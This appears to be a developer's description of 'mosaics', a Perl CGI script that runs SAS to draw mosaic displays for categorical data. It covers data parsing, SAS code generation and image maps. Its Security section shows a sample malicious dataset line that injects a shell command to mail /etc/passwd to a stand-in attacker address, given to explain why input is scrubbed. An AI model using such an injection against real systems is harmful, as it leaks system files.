mosaics was written as a Perl server-based CGI script.
It could have been written as a Java application, and provide
a somewhat nicer user interface, but that would limit the
application to those with Java-capable browsers. Think of
it as a Weblet for the Java-challenged .
Sources
- This Web application uses MOSAICS.SAS,
a SAS/IML application for the analysis of categorical data
using Mosaic Displays.
(MOSAICS.SAS has some additional features not available through
this forms interface.)
- The Web interface is written as a Perl script,
using Lincoln Stein's
Perl CGI Library, CGI.pm.
Thanks, Lincoln.
- PostScript to GIF conversion uses the pstogif
utility from
LaTeX2HTML
by Nikos Drakos.
- The JavaScript imagemaps technique comes from an example on
The JavaScript Workshop's
JavaScript Examples
collection.
- GIF size calculation was stolen from Andrew Tong's
gifsize
and Alex Knowle's
wwwimagesize.
How Does it Work?
The entire thing is done by the CGI script. After printing the forms, the program:
- retrieves the input parameters from the CGI query.
- reads and parses the data, either from a sample file, from the
form, or from an uploaded file.
- writes a SAS program, interpolating the user's data into a
template,
- runs the program (by a system() call) producing a PostScript file, and one or more
files containing the imagemap information.
- converts each Postscript page to a gif image.
- reads the imagemap information, massaging it into the form of
a client-side image map.
- reads and parses the SAS listing file to extract the Model
summary information.
- returns the image to the browser, together with links to the
SAS program, the output listing file, and a small JavaScript function
which activates the imagemap.
I cribbed the basic structure from my
Sieve Diagram script, but had learned a
bit in the interim.
Data Structure
Most form-based web applications need to get only a few numbers or
selections from the user, and it is not difficult to validate
these, either in the server CGI script or with
Try it too].
It is considerably harder to provide a general method for the user to input
a dataset -- a table consisting of an arbitrary number of numeric or character variables with an arbitrary number of observations (rows).
In the mosaics application, we need to:
- Read and parse the dataset, whaterver its source.
- Extract variable names, variable type (character or numeric),
- Perform some consistency and validity checks.
- Construct the input to SAS which will create a valid SAS
dataset.
- Use the dataset information (variable names) in preparing the
program output.
SAS datasets consist of a data table plus a data dictionary
and mosaics constructs something similar using a "hash", a
Perl data structure like an association list.
The %dataset structure is shown below
Contents | Perl constructor |
Dataset title (string) | $dataset->{TITLE} = $title; |
Number of rows (scalar) | $dataset->{ROWS} = $rows; |
Number of columns (scalar) | $dataset->{COLS} = scalar @col_type; |
Variable names (list) | $dataset->{VARS} = [ @vars ]; |
Number of rows (scalar) | $dataset->{TYPE} = [ @col_type ]; |
Variable field width (list) | $dataset->{LENGTH} = [ @col_length ]; |
Data table (string) | $dataset->{DATA} = join("\n", @data); |
The data table itself is parsed as a list of its rows (@data), but then stored
as a newline-delimited string.
Variable types are stored as 'C' or 'N', with the rule that a variable is considered character
if any row contains non-numeric (/-?\d+/) characters.
Security
Always a problem when dealing with form- or uploaded-data which is passed to another
program.
We wouldn't like to be on the receiving end of a "dataset" which contained the following
Fee Fie Fo Fum 234
Ima Gonna Get Ya 123
;;;; x "mail -s 'HaHa' cracker@net.net </etc/passwd";
The data therefore is scrubbed to remove all characters which should not appear in
ordinary data.
SAS Data Step
This data structure makes it fairly simple to perform some reasonable (but rudimentary)
validation on the dataset and variables, and to construct the SAS data step in a general way:
@vars = @{$dataset->{VARS}};
@type = @{$dataset->{TYPE}};
foreach $i (0..$#vars) { # construct input variable list
$invar .= $vars[$i];
$invar .= $type[$i] eq 'C' ? ' $ ' : ' ';
}
$datastep = <<END_OF_DATASTEP
data temp;
input $invar;
datalines;
$data
END_OF_DATASTEP
;
So, if the variables are HAIR, EYE, SEX (all character) and COUNT, the data step becomes:
data temp;
input HAIR $ EYE $ SEX $ COUNT;
datalines;
Brown Black M 32
...
MOSAICS.SAS maintains a table of the coordinates of all tiles in the
mosaic display. I wrote an add-in module to convert these coordinates
to a format which could be used as a client-side image map.
This was not straight-forward, because:
- The mosaic uses a coordinate system with (0,0) as the lower left
corner of the bottom-left tile and (100,100) as the upper right corner
of the top-right tile. Imagemaps use a coordinate system in pixels,
with (0,0) as the top-left corner.
- That wouldn't be hard, except that there seems to be no reliable
way in SAS/IML to determine the bounding box of the entire figure
when the labels and title are added around the mosaic tiles.
This introduces slight errors in the imagemap coordinates of the
boxes, but they are now not perceptible except at high magnification.
Nonetheless, the SAS module does its best and produces a table
containing one row for each tile in the mosaic, with
the cell label, imagemap coordinates, and cell statistics
(observed frequency, fitted frequency, residual)
in the following format (chosen to be particular
easy to parse in Perl):
Black:Brown| 69 435 211 915| 68 40.1 4.4
Black:Blue | 69 266 211 407| 20 39.2 -3.1
Black:Hazel| 69 131 211 237| 15 17.0 -0.5
Black:Green| 69 68 211 103| 5 11.7 -2.0
Brown:Brown| 239 598 614 915| 119 106.3 1.2
Brown:Blue | 239 346 614 570| 84 103.9 -1.9
Brown:Hazel| 239 173 614 317| 54 44.9 1.4
...
Since the SAS program cannot know the size of the final
GIF image, it uses coordinates in the range of (0..1000).
mosaics extracts the acutal size of the image from the
GIF file itself, and rescales these to the proper range.
mosaics uses these rescaled coordinates
to produce a client-side image map, of the form,
<map name="mos1168i1">
<area shape=rect coords="0,20,42,276"
href="javascript:Show('Black','108','148.0','-3.3');">
<area shape=rect coords="51,20,165,276"
href="javascript:Show('Brown','286','148.0','11.3');">
<area shape=rect coords="174,20,202,276"
href="javascript:Show('Red','71','148.0','-6.3');">
<area shape=rect coords="211,20,262,276"
href="javascript:Show('Blond','127','148.0','-1.7');">
<area shape=default href="javascript:Show('Select a cell','','','');"
onMouseOver="window.status='Select a cell'; return true;">
</map>
The GIF image is connected to the image map by including the USEMAP=
attribute in the <IMG> tag.
To Do
- Add the ability to reorder the variables in the dataset. [Done, but
not well tested]
- Improve error trapping, particularly for entered or
uploaded data.
- Figure out how to serve each graph on a separate page, with
controls to navigate from one to the next.